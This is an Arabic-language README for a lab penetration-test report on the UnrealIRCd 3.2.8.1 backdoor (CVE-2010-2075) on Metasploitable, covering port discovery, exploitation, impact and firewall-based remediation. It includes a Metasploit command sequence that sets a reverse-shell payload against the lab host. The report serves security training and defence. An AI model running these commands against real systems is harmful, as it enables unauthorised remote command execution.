
تقرير مختبر اختبار اختراق مُتحكَّم فيه حول ثغرة الباب الخلفي في UnrealIRCd 3.2.8.1 (CVE-2010-2075) على Metasploitable3 مع خطوات المعالجة.
مشروع اختبار اختراق مُتحكم به يركّز على تحديد واستغلال ومعالجة الباب الخلفي لـ UnrealIRCd 3.2.8.1 (CVE-2010-2075) في بيئة تدريب معزولة.
إخلاء مسؤولية: أُجري هذا المشروع حصرياً لأغراض تعليمية واختبارات أمنية مصرح بها ضد بيئة معملية معرّضة للخطر عمداً. لم يتم استهداف أي أنظمة غير مصرح بها.
يوضح هذا المشروع سير عمل كاملاً لتقييم الثغرات واستغلالها ضد خدمة UnrealIRCd 3.2.8.1 المعرّضة للخطر.
يغطي التقييم ما يلي:
| البند | التفاصيل |
|---|---|
| الهدف | بيئة معملية Metasploitable |
| عنوان IP الهدف | 10.10.10.13 |
| الخدمة المعرّضة للخطر | UnrealIRCd |
| الإصدار | 3.2.8.1 |
| البروتوكول | IRC |
| المنفذ | 6667/TCP |
| الثغرة | الباب الخلفي لـ UnrealIRCd |
| CVE | CVE-2010-2075 |
| الخطورة | حرجة |
وفقاً لقاعدة بيانات الثغرات الوطنية (NVD) التابعة لـ NIST، احتوت توزيعات UnrealIRCd 3.2.8.1 المتأثرة على تعديل مُدخل خارجياً قد يسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية.
كانت الأهداف الرئيسية لهذا التقييم:
اتبع التقييم سير عمل مبسطاً لاختبار الاختراق:
Reconnaissance
↓
Service Enumeration
↓
Vulnerability Identification
↓
Exploitation
↓
Evidence Collection
↓
Impact Assessment
↓
Remediation
↓
Verification
كانت المرحلة الأولى هي تحديد الخدمات المكشوفة على المضيف الهدف.
حدد التقييم خدمة IRC تستمع على:
TCP/6667
ارتبطت الخدمة بـ UnrealIRCd 3.2.8.1، وهو إصدار معروف بتأثره بثغرة الباب الخلفي.

الشكل 1 — فحص المنافذ وجرد الخدمات
قدم اكتشاف TCP/6667 المؤشر الأولي على أن خدمة IRC كانت مكشوفة وتتطلب مزيداً من التحقيق.
ارتبط إصدار UnrealIRCd المحدد بـ CVE-2010-2075.
الثغرة ليست مجرد خطأ برمجي تقليدي. احتوى الأرشيف المتأثر على تعديل/باب خلفي خبيث مكّن من تنفيذ الأوامر عن بُعد. يصف NVD المشكلة بأنها حصان طروادة مُدخل خارجياً في ماكرو DEBUG3_DOLOG_SYSTEM.
توثق وثائق Rapid7 الخاصة بـ Metasploit الوحدة المقابلة على النحو التالي:
exploit/unix/irc/unreal_ircd_3281_backdoor
وتصفها بأنها تستغل الباب الخلفي الخبيث الموجود في أرشيفات UnrealIRCd 3.2.8.1 المتأثرة.
تم التحقق من صحة الثغرة في بيئة المختبر المعزولة باستخدام Metasploit Framework.
مثال على سير عمل الاستغلال:
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 10.10.10.13
set PAYLOAD cmd/unix/reverse
run
كان الغرض من هذه الخطوة هو التحقق مما إذا كان يمكن إساءة استخدام الخدمة المكشوفة للحصول على تنفيذ أوامر عن بُعد.
توثق Rapid7 وحدة Metasploit هذه خصيصاً للباب الخلفي لـ UnrealIRCd 3.2.8.1.

الشكل 2 — دليل الاستغلال المُتحكم به
يوضح الدليل مرحلة الاستغلال التي نُفذت ضد الهدف المعملي المصرح به.
يمكن أن يمنح الاستغلال الناجح للباب الخلفي المهاجم القدرة على تنفيذ الأوامر عن بُعد في السياق الأمني لعملية UnrealIRCd المتأثرة.
تعتمد الصلاحيات الدقيقة التي يتم الحصول عليها على الحساب الذي يعمل به برنامج IRC الخفي.
يشمل الأثر المحتمل:
مهم: لا ينبغي تفسير الأثر المحتمل على أنه دليل على تنفيذ كل إجراء مذكور خلال هذا التقييم.
تؤكد وثائق Nmap للباب الخلفي لـ UnrealIRCd أن الثغرة يمكن استخدامها لتنفيذ أوامر عشوائية على النظام البعيد.
لا ينبغي أن تظل تركيبة UnrealIRCd المعرّضة للخطر مكشوفة في بيئة إنتاج.
تشمل إجراءات المعالجة الموصى بها:
إذا لم تكن IRC مطلوبة:
sudo ufw deny 6667/tcp
إذا كانت الخدمة مطلوبة، فيجب تقييد الوصول إلى الشبكات الموثوقة بدلاً من تعريضها على نطاق واسع.
النهج المفضل هو إزالة البرنامج المعرّض للخطر ونشر إصدار مدعوم وموثوق بدلاً من محاولة الاعتماد فقط على تصفية الشبكة.
تم توثيق مرحلة المعالجة بعد تطبيق الضوابط الأمنية المناسبة.

الشكل 3 — دليل المعالجة / التحصين
يجب أن يوضح دليل المعالجة حالة الخدمة و/أو تكوين جدار الحماية بعد تطبيق الإجراءات التصحيحية.
صُمم الباب الخلفي للسماح بتنفيذ الأوامر عن بُعد ويمكن أن يعمل بشكل مستقل عن قيود مستخدمي IRC العادية، مما يجعل تعريض الخدمة المعرّضة للخطر خطراً أمنياً كبيراً.
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
├── port_scan.png
├── exploit_evidence.png
└── remediation.png
| الدليل | الوصف |
|---|---|
port_scan.png | اكتشاف خدمة IRC المكشوفة |
exploit_evidence.png | دليل الاستغلال المُتحكم به |
remediation.png | دليل التحصين/الأمن بعد المعالجة |
يوضح هذا التقييم عدة مفاهيم مهمة لاختبار الاختراق:
قاعدة بيانات الثغرات الوطنية NIST — CVE-2010-2075
تفاصيل CVE ووصف الثغرة.
قاعدة بيانات الثغرات Rapid7 — تنفيذ أوامر الباب الخلفي لـ UnrealIRCd 3.2.8.1
توثيق وحدة Metasploit والتفاصيل الفنية.
Rapid7 Metasploit Framework — وحدة الباب الخلفي لـ UnrealIRCd
التنفيذ الرسمي لوحدة Metasploit.
وثائق Nmap NSE — irc-unrealircd-backdoor
توثيق اكتشاف الباب الخلفي لـ UnrealIRCd.
هذا المستودع مخصص حصرياً للتعليم في مجال الأمن السيبراني، واختبار الاختراق المصرح به، والبحث الأمني في البيئات الخاضعة للرقابة.
يجب استخدام التقنيات الموضحة في هذا المشروع فقط ضد الأنظمة التي تم الحصول على إذن صريح لاختبارها.
لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها.
| الأداة | الغرض |
|---|
| Nmap | فحص المنافذ وجرد الخدمات |
| Netcat | اختبار اتصال خدمات TCP |
| Metasploit Framework | الاستغلال المُتحكم به |
| Linux CLI | التحقق من النظام وتحصينه |
| UFW | تكوين جدار الحماية |
| Python | دعم المهام الأمنية/الاختبارية |
| الفئة | التقييم |
|---|
| الثغرة | الباب الخلفي لـ UnrealIRCd 3.2.8.1 |
| CVE | CVE-2010-2075 |
| ناقل الهجوم | الشبكة |
| المصادقة المطلوبة | لا تتطلب مصادقة لتفعيل الباب الخلفي |
| تفاعل المستخدم | غير مطلوب |
| الأثر | تنفيذ أوامر عن بُعد |
| الخطورة | حرجة |